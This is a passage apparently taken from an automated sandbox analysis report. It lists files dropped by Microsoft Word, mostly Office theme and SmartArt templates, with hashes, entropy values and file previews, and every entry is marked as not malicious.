                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):242
                                                                                                                                                Entropy (8bit):3.4938093034530917
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                                                MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                                                SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                                                SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                                                SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):4888
                                                                                                                                                Entropy (8bit):7.8636569313247335
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):3.5161159456784024
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUX+l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyulNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                MD5:C15EB3F4306EBF75D1E7C3C9382DEECC
                                                                                                                                                SHA1:A3F9684794FFD59151A80F97770D4A79F1D030A6
                                                                                                                                                SHA-256:23C262DF3AEACB125E88C8FFB7DBF56FD23F66E0D476AFD842A68DDE69658C7F
                                                                                                                                                SHA-512:ACDF7D69A815C42223FD6300179A991A379F7166EFAABEE41A3995FB2030CD41D8BCD46B566B56D1DFBAE8557AFA1D9FD55143900A506FA733DE9DA5D73389D6
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File] OriginalName: turabian.xsl; Component: WordFiles; ReqVer: 14; Executable: {WD}; StoreLocation: {My Templates}; Command: /f {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):344303
                                                                                                                                                Entropy (8bit):5.023195898304535
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:UwprANnsqvtfL/vF/bkWPRMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iD:6
                                                                                                                                                MD5:F079EC5E2CCB9CD4529673BCDFB90486
                                                                                                                                                SHA1:FBA6696E6FA918F52997193168867DD3AEBE1AD6
                                                                                                                                                SHA-256:3B651258F4D0EE1BFFC7FB189250DED1B920475D1682370D6685769E3A9346DB
                                                                                                                                                SHA-512:4FFFA59863F94B3778F321DA16C43B92A3053E024BDD8C5317077EA1ECC7B09F67ECE3C377DB693F3432BF1E2D947EC5BF8E88E19157ED08632537D8437C87D6
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:<?xml version="1.0" encoding="utf-8"?> <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp"> <xsl:output method="html" encoding="us-ascii"/> <xsl:template match="*" mode="outputHtml2"> <xsl:apply-templates mode="outputHtml"/> </xsl:template> <xsl:template name="StringFormatDot"> <xsl:param name="format" /> <xsl:param name="parameters" /> <xsl:variable name="prop_EndChars"> <xsl:call-template name="templ_prop_EndChars"/> </xsl:variable> <xsl:choose> <xsl:when test="$format = ''"></xsl:when> <xsl:when test="substring($format, 1, 2) = '%%'"> <xsl:text>%</xsl:text> <xsl:call-template name="StringFormatDot"> <xsl:with-param name="format" select="substring($format, 3)" /> <xsl:with-param name="parameters" select="$pa
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):486596
                                                                                                                                                Entropy (8bit):7.668294441507828
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                                                                                MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                                                                                SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                                                                                SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                                                                                SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):274
                                                                                                                                                Entropy (8bit):3.535303979138867
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                                                                                MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                                                                                SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                                                                                SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                                                                                SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File] OriginalName: View.thmx; Component: PPTFiles; ReqVer: 14; Executable: {PP}; StoreLocation: {My Templates}; Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.484503080761839
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:fxnxUXGdQ1MecJZMlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny2dQ98MlWlzGHmD0+dAH/luWvv
                                                                                                                                                MD5:1309D172F10DD53911779C89A06BBF65
                                                                                                                                                SHA1:274351A1059868E9DEB53ADF01209E6BFBDFADFB
                                                                                                                                                SHA-256:C190F9E7D00E053596C3477455D1639C337C0BE01012C0D4F12DFCB432F5EC56
                                                                                                                                                SHA-512:31B38AD2D1FFF93E03BF707811F3A18AD08192F906E36178457306DDAB0C3D8D044C69DE575ECE6A4EE584800F827FB3C769F98EA650F1C208FEE84177070339
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File] OriginalName: InterconnectedBlockProcess.glox; Component: WordFiles; ReqVer: 14; StoreLocation: {My Templates}\SmartArt Graphics
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):9191
                                                                                                                                                Entropy (8bit):7.93263830735235
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:192:oeAMExvPJMg+yE+AfJLi3+Xoj7F3sPgMG61J88eDhFWT7hFNsdJtnLYJ7tSh:v2d+hnfJLi3+4ja4WqhFWT7FsdHMA
                                                                                                                                                MD5:08D3A25DD65E5E0D36ADC602AE68C77D
                                                                                                                                                SHA1:F23B6DDB3DA0015B1D8877796F7001CABA25EA64
                                                                                                                                                SHA-256:58B45B9DBA959F40294DA2A54270F145644E810290F71260B90F0A3A9FCDEBC1
                                                                                                                                                SHA-512:77D24C272D67946A3413D0BEA700A7519B4981D3B4D8486A655305546CE6133456321EE94FD71008CBFD678433EA1C834CFC147179B31899A77D755008FCE489
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):924687
                                                                                                                                                Entropy (8bit):7.824849396154325
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:lsadD3eLxI8XSh4yDwFw8oWR+6dmw2ZpQDKpazILv7Jzny/ApcWqyOpEZULn:qLxI8XSh4yUF/oWR+mLKpYIr7l3ZQ7n
                                                                                                                                                MD5:97EEC245165F2296139EF8D4D43BBB66
                                                                                                                                                SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                                                                                                                SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                                                                                                                SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):3.51145753448333
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXKsWkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6svymD0wbnKNAH/lMz1
                                                                                                                                                MD5:7956D2B60E2A254A07D46BCA07D0EFF0
                                                                                                                                                SHA1:AF1AC8CA6FE2F521B2EE2B7ABAB612956A65B0B5
                                                                                                                                                SHA-256:C92B7FD46B4553FF2A656FF5102616479F3B503341ED7A349ECCA2E12455969E
                                                                                                                                                SHA-512:668F5D0EFA2F5168172E746A6C32820E3758793CFA5DB6791DE39CB706EF7123BE641A8134134E579D3E4C77A95A0F9983F90E44C0A1CF6CDE2C4E4C7AF1ECA0
                                                                                                                                                Malicious:false
                                                                                                                                                 Preview:[File] OriginalName: Parallax.thmx; Component: PPTFiles; ReqVer: 14; Executable: {PP}; StoreLocation: {My Templates}; Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):608122
                                                                                                                                                Entropy (8bit):7.729143855239127
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:Ckl6KRKwg9jf2q/bN69OuGFlC/DUhq68xOcJzGYnTxlLqU8dmTW:8yKwgZ2qY9kA7Uhq68H3ybmq
                                                                                                                                                MD5:8BA551EEC497947FC39D1D48EC868B54
                                                                                                                                                SHA1:02FA15FDAF0D7E2F5D44CAE5FFAE49E8F91328DF
                                                                                                                                                SHA-256:DB2E99B969546E431548EBD58707FC001BBD1A4BDECAD387D194CC9C6D15AC89
                                                                                                                                                SHA-512:CC97F9B2C83FF7CAC32AB9A9D46E0ACDE13EECABECD653C88F74E4FC19806BB9498D2F49C4B5581E58E7B0CB95584787EA455E69D99899381B592BEA177D4D4B
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.516359852766808
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXKwRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6qymD0wbnKNAH/lMz1
                                                                                                                                                MD5:960E28B1E0AB3522A8A8558C02694ECF
                                                                                                                                                SHA1:8387E9FD5179A8C811CCB5878BAC305E6A166F93
                                                                                                                                                SHA-256:2707FCA8CEC54DF696F19F7BCAD5F0D824A2AC01B73815DE58F3FCF0AAB3F6A0
                                                                                                                                                SHA-512:89EA06BA7D18B0B1EA624BBC052F73366522C231BD3B51745B92CF056B445F9D655F9715CBDCD3B2D02596DB4CD189D91E2FE581F2A2AA2F6D814CD3B004950A
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]; OriginalName: Parcel.thmx; Component: PPTFiles; ReqVer: 14; Executable: {PP}; StoreLocation: {My Templates}; Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):558035
                                                                                                                                                Entropy (8bit):7.696653383430889
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:DQ/oYjRRRRRRRRYcdY/5ASWYqBMp8xsGGEOzI7vQQwOyP:DQ/nRRRRRRRRxY/5JWYZ3GGbI8YA
                                                                                                                                                MD5:3B5E44DDC6AE612E0346C58C2A5390E3
                                                                                                                                                SHA1:23BCF3FCB61F80C91D2CFFD8221394B1CB359C87
                                                                                                                                                SHA-256:9ED9AD4EB45E664800A4876101CBEE65C232EF478B6DE502A330D7C89C9AE8E2
                                                                                                                                                SHA-512:2E63419F272C6E411CA81945E85E08A6E3230A2F601C4D28D6312DB5C31321F94FAFA768B16BC377AE37B154C6869CA387005693A79C5AB1AC45ED73BCCC6479
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.5361139545278144
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXeMWMluRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnycMlMymD0wbnKNAH/lMz1
                                                                                                                                                MD5:133D126F0DE2CC4B29ECE38194983265
                                                                                                                                                SHA1:D8D701298D7949BE6235493925026ED405290D43
                                                                                                                                                SHA-256:08485EBF168364D846C6FD55CD9089FE2090D1EE9D1A27C1812E1247B9005E68
                                                                                                                                                SHA-512:75D7322BE8A5EF05CAA48B754036A7A6C56399F17B1401F3F501DA5F32B60C1519F2981043A773A31458C3D9E1EF230EC60C9A60CAC6D52FFE16147E2E0A9830
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]; OriginalName: Basis.thmx; Component: PPTFiles; ReqVer: 14; Executable: {PP}; StoreLocation: {My Templates}; Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):562113
                                                                                                                                                Entropy (8bit):7.67409707491542
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:/dy5Gtyp/FZ9QqjdxDfSp424XeavSktiAVE0:/dizp1ndpqpMZnV
                                                                                                                                                MD5:4A1657A3872F9A77EC257F41B8F56B3D
                                                                                                                                                SHA1:4DDEA85C649A2C1408B5B08A15DEF49BAA608A0B
                                                                                                                                                SHA-256:C17103ADE455094E17AC182AD4B4B6A8C942FD3ACB381F9A5E34E3F8B416AE60
                                                                                                                                                SHA-512:7A2932639E06D79A5CE1D3C71091890D9E329CA60251E16AE4095E4A06C6428B4F86B7FFFA097BF3EEFA064370A4D51CA3DF8C89EAFA3B1F45384759DEC72922
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):278
                                                                                                                                                Entropy (8bit):3.535736910133401
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXeAlFkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyRGymD0wbnKNAH/lMz1
                                                                                                                                                MD5:487E25E610F3FC2EEA27AB54324EA8F6
                                                                                                                                                SHA1:11C2BB004C5E44503704E9FFEEFA7EA7C2A9305C
                                                                                                                                                SHA-256:022EC5077279A8E447B590F7260E1DBFF764DE5F9CDFD4FDEE32C94C66D4A1A2
                                                                                                                                                SHA-512:B8DF351E2C0EF101CF91DC02E136A3EE9C1FDB18294BECB13A29D676FBBE791A80A58A18FBDEB953BC21EC54EB7608154D401407C461ABD10ACB94CE8AD0E092
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]; OriginalName: Banded.thmx; Component: PPTFiles; ReqVer: 14; Executable: {PP}; StoreLocation: {My Templates}; Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):777647
                                                                                                                                                Entropy (8bit):7.689662652914981
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:B04bNOJMngI856k0wwOGXMaXTLaTDmfBaN2Tx9iSUk1PdSnc0lnDlcGMcEFYYYYt:xbY6ngI46Aw5dmyYYYYYYYYY7p8d
                                                                                                                                                MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                                                                                                                SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                                                                                                                SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                                                                                                                SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):290
                                                                                                                                                Entropy (8bit):3.5091498509646044
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUX1MiDuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyFdMymD0wbnKNAH/lMz1
                                                                                                                                                MD5:23D59577F4AE6C6D1527A1B8CDB9AB19
                                                                                                                                                SHA1:A345D683E54D04CC0105C4BFFCEF8C6617A0093D
                                                                                                                                                SHA-256:9ADD2C3912E01C2AC7FAD6737901E4EECBCCE6EC60F8E4D78585469A440E1E2C
                                                                                                                                                SHA-512:B85027276B888548ECB8A2FC1DB1574C26FF3FCA7AF1F29CD5074EC3642F9EC62650E7D47462837607E11DCAE879B1F83DF4762CA94667AE70CBF78F8D455346
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]; OriginalName: Metropolitan.thmx; Component: PPTFiles; ReqVer: 14; Executable: {PP}; StoreLocation: {My Templates}; Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):570901
                                                                                                                                                Entropy (8bit):7.674434888248144
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:D2tTXiO/3GH5SkPQVAqWnGrkFxvay910UUTWZJarUv9TA0g8:kX32H+VWgkFxSgGTmarUv9T
                                                                                                                                                MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                                                                                                                SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                                                                                                                SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                                                                                                                SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):3.5459495297497368
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXvBAuRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnypJymD0wbnKNAH/lMz1
                                                                                                                                                MD5:76340C3F8A0BFCEDAB48B08C57D9B559
                                                                                                                                                SHA1:E1A6672681AA6F6D525B1D17A15BF4F912C4A69B
                                                                                                                                                SHA-256:78FE546321EDB34EBFA1C06F2B6ADE375F3B7C12552AB2A04892A26E121B3ECC
                                                                                                                                                SHA-512:49099F040C099A0AED88E7F19338140A65472A0F95ED99DEB5FA87587E792A2D11081D59FD6A83B7EE68C164329806511E4F1B8D673BEC9074B4FF1C09E3435D
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:[File]; OriginalName: Dividend.thmx; Component: PPTFiles; ReqVer: 14; Executable: {PP}; StoreLocation: {My Templates}; Command: {FilePath}
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):966946
                                                                                                                                                Entropy (8bit):7.8785200658952
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:qBcvGBGhXQir6H1ws6+iU0YuA35VuinHX2NPs:ccvGBGdQ5CsMxQVj3yPs
                                                                                                                                                MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                                                                                                                SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                                                                                                                SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                                                                                                                SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):282
                                                                                                                                                Entropy (8bit):3.5323495192404475
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXhduDARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnyxdumymD0wbnKNAH/lMz1
                                                                                                                                                MD5:BD6B5A98CA4E6C5DBA57C5AD167EDD00
                                                                                                                                                SHA1:CCFF7F635B31D12707DC0AC6D1191AB5C4760107
                                                                                                                                                SHA-256:F22248FE60A55B6C7C1EB31908FAB7726813090DE887316791605714E6E3CEF7
                                                                                                                                                SHA-512:A178299461015970AF23BA3D10E43FCA5A6FB23262B0DD0C5DDE01D338B4959F222FD2DC2CC5E3815A69FDDCC3B6B4CB8EE6EC0883CE46093C6A59FF2B042BC1
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .Q.u.o.t.a.b.l.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft OOXML
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):523048
                                                                                                                                                Entropy (8bit):7.715248170753013
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6144:WfmDdN6Zfv8q5rnM6vZ02PtMZRkfW5ipbnMHxVcsOWrCMxy0sD/mcKb4rYEY:xDdQXBrMi2YtggW5ObnMH1brJpUmBU0N
                                                                                                                                                MD5:C276F590BB846309A5E30ADC35C502AD
                                                                                                                                                SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                                                                                                                SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                                                                                                                SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):276
                                                                                                                                                Entropy (8bit):3.5159096381406645
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXQIa3ARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnygIaqymD0wbnKNAH/lMz1
                                                                                                                                                MD5:71CCB69AF8DD9821F463270FB8CBB285
                                                                                                                                                SHA1:8FED3EB733A74B2A57D72961F0E4CF8BCA42C851
                                                                                                                                                SHA-256:8E63D7ABA97DABF9C20D2FAC6EB1665A5D3FDEAB5FA29E4750566424AE6E40B4
                                                                                                                                                SHA-512:E62FC5BEAEC98C5FDD010FABDAA8D69237D31CA9A1C73F168B1C3ED90B6A9B95E613DEAD50EB8A5B71A7422942F13D6B5A299EB2353542811F2EF9DA7C3A15DC
                                                                                                                                                Malicious:false
                                                                                                                                                Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .F.r.a.m.e...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1463634
                                                                                                                                                Entropy (8bit):7.898382456989258
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24576:75MGNW/UpLkupMAqDJhNHK4/TuiKbdhbZM+byLH/:7ZwUpLkulkHK46iiDZHeLH/
                                                                                                                                                MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                                                                                                                SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                                                                                                                SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                                                                                                                SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):280
                                                                                                                                                Entropy (8bit):3.5286004619027067
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:6:Q+sxnxUXOzXkRELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxny6WymD0wbnKNAH/lMz1
                                                                                                                                                MD5:40FF521ED2BA1B015F17F0B0E5D95068
                                                                                                                                                SHA1:0F29C084311084B8FDFE67855884D8EB60BDE1A6
